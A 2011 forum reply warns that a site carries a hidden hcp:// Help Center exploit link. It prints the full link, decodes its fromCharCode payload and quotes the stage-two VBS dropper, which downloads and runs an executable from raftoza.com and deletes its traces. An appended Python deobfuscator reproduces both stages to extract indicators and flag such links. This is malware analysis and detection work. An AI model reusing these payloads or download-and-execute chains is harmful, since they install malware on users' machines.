Thread: <3 this site
04-11-2011, 09:06   #2
Naedion
r3d 3vil w3zurd
Join Date: May 2006
Posts: 679
Re: <3 this site

Hm, are you sure this is a trustworthy site?

The site contains a script hidden in a link:
========================
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm?svr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,114,97,102,116,111,122,97,46,99,111,109,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,51,54,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</script>
========================

The colored part, translated:

========================
cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://raftoza.com/content/hcp_vbs.php?f=36&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe
========================

Execute a VBS script, start the command shell, get code from
a website, then execute the downloaded script.

The code from the website http:// raftoza.com / content / hcp_vbs. php ?f=36 &d=0:

========================
w=3000:x=200:y=1:z=false
a = "http://raftoza.com/w.php?e=7&f=36"
' StrReverse() hides the ProgIDs: Scripting.FileSystemObject, MSXML2.XMLHTTP, ADODB.Stream, WScript.Shell
Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS"))
Set f=e.GetSpecialFolder(2)
' Month("2010-02-16") is 2, so the drop path "\exe.ex2" becomes "\exe.exe" under %TEMP%
b = f & "\exe.ex2":b=Replace(b,Month("2010-02-16"),"e")
OT = "GET"
Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM"))
Set d = CreateObject(StrReverse("maertS.BDODA"))
Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS"))
On Error resume next
c.open OT, a, z:c.send()
If c.Status = x Then
    d.Open:d.Type = y:d.Write c.ResponseBody:d.SaveToFile b:d.Close
End If
Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW"))
' Replace("W.ex2c b", 2, "E") yields "W.exEc b": the shell object executes the downloaded file
Eval(Replace("W.ex2c b", Month("2010-02-16"), "E"))
W.eXeC "taskkill /F /IM wmplayer.exe":W.eXeC "taskkill /F /IM realplay.exe"
' remove the dropper ("l.vbs"), wait, then remove the executable
Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("bv.l") & "s"):g.Delete
WScript.Sleep w
Set g=o.GetFile(b):g.Delete
========================

This code connects again to the web server and downloads an .exe file, for example contact.ext, readme.exe ...


Last edited by Naedion; 04-11-2011 at 09:24.
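An added example for readers of this thread, not code from the post or from the site it discusses: a small Python deobfuscator that does mechanically what the poster did by hand for both stages (the String.fromCharCode() list inside the hcp:// link, then the StrReverse()/Month() tricks in the downloaded VBS), pulls out the indicators a responder cares about (URLs, dropped files, COM objects, killed processes), and flags hcp:// links of this shape. The link is the Windows Help Center (helpctr.exe) hcp:// whitespace-escape bug patched in MS10-042. Assumptions: the run of %A% escapes is shortened to 40 copies and the stage-two text is a constructed excerpt of the script quoted above; looks_like_hcp_exploit() is a home-made heuristic, not a vendor signature.

```python
"""Deobfuscate the two-stage hcp:// dropper quoted in the post and extract IOCs.

Added example, not from the original post. STAGE1 is the String.fromCharCode()
list copied from the link (forum line-wrap spaces removed); the %A% run is
shortened; STAGE2_VBS is a constructed excerpt of hcp_vbs.php as quoted.
"""
import re
from datetime import date
from urllib.parse import unquote

CHARCODES = (
    "99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,"
    "79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,"
    "104,116,116,112,58,47,47,114,97,102,116,111,122,97,46,99,111,109,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,"
    "46,112,104,112,63,102,61,51,54,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,"
    "67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,"
    "79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,"
    "116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,"
    "105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,"
    "58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,"
    "46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,"
    "37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,"
    "32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101"
)
# Constructed from the post's link; the real one carries a much longer %A% run.
HCP_LINK = (
    "hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm"
    + "%A%" * 40
    + "..%5C..%5Csysinfomain.htm?svr=<script defer>eval(Run(String.fromCharCode("
    + CHARCODES + ")));</script>"
)
# Constructed excerpt of the stage-two VBS quoted in the post.
STAGE2_VBS = (
    'a = "http://raftoza.com/w.php?e=7&f=36"\n'
    'Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS"))\n'
    'b = f & "\\exe.ex2":b=Replace(b,Month("2010-02-16"),"e")\n'
    'Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM"))\n'
    'Set d = CreateObject(StrReverse("maertS.BDODA"))\n'
    'Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW"))\n'
    'Eval(Replace("W.ex2c b", Month("2010-02-16"), "E"))\n'
    'W.eXeC "taskkill /F /IM wmplayer.exe":W.eXeC "taskkill /F /IM realplay.exe"\n'
)


def decode_fromcharcode(text: str) -> list[str]:
    """Decode every String.fromCharCode(...) list in text.
    Whitespace inside the list (forum line wrapping) is dropped first."""
    out = []
    for m in re.finditer(r"String\.fromCharCode\(([\d,\s]+)\)", text):
        nums = re.sub(r"\s+", "", m.group(1)).strip(",").split(",")
        out.append("".join(chr(int(n)) for n in nums if n))
    return out


def unreverse(vbs: str) -> str:
    """Fold "a" & "b" literal concatenations, then replace StrReverse("...") by
    the reversed literal so the real ProgIDs become visible."""
    vbs = re.sub(r'"\s*&\s*"', "", vbs)
    return re.sub(r'StrReverse\("([^"]*)"\)', lambda m: '"' + m.group(1)[::-1] + '"', vbs)


def fold_month(vbs: str) -> str:
    """Evaluate Month("YYYY-MM-DD") to its number and apply Replace() on string
    literals: the script uses the month as the search string (2 -> e / E)."""
    vbs = re.sub(r'Month\("(\d{4}-\d{2}-\d{2})"\)',
                 lambda m: str(date.fromisoformat(m.group(1)).month), vbs)
    return re.sub(r'Replace\("([^"]*)",\s*(\d+),\s*"([^"]*)"\)',
                  lambda m: '"' + m.group(1).replace(m.group(2), m.group(3)) + '"', vbs)


def extract_iocs(script: str) -> dict[str, list[str]]:
    """URLs, dropped file names, COM objects and killed processes in a decoded stage."""
    return {
        "urls": sorted(set(re.findall(r'https?://[^\s"\']+', script))),
        "files": sorted(set(re.findall(r'[\w.]+\.(?:vbs|exe|ex2)\b', script))),
        "com_objects": sorted(set(re.findall(r'Create[Oo]bject\("([^"]+)"\)', script))),
        "killed": sorted(set(re.findall(r'taskkill /F /IM ([\w.]+)', script))),
    }


def looks_like_hcp_exploit(url: str) -> bool:
    """Home-made heuristic: an hcp:// link with a run of %A% escapes, a ..\\
    traversal in the topic, or an inline <script>. Not a vendor signature."""
    if not url.lower().startswith("hcp://"):
        return False
    decoded = unquote(url).lower()
    return bool(re.search(r"(?:%a%){3,}", url.lower())
                or "..\\" in decoded or "<script" in decoded)


if __name__ == "__main__":
    stage1 = decode_fromcharcode(HCP_LINK)[0]
    print(stage1)
    print(extract_iocs(stage1))
    stage2 = fold_month(unreverse(STAGE2_VBS))
    print(stage2)
    print(extract_iocs(stage2))
    print("suspicious link:", looks_like_hcp_exploit(HCP_LINK))
```

Running it prints the same cmd /c echo ... line the poster decoded, the stage-two script with the ProgIDs and the W.exEc call in the clear, and the two download URLs, the l.vbs dropper, the helpctr.exe/wmplayer.exe/realplay.exe kills as a blocklist. The %A% run and the ..%5C traversal are what to look for in proxy logs; the fromCharCode() decoder is worth keeping around because the same wrapper shows up in many drive-by pages.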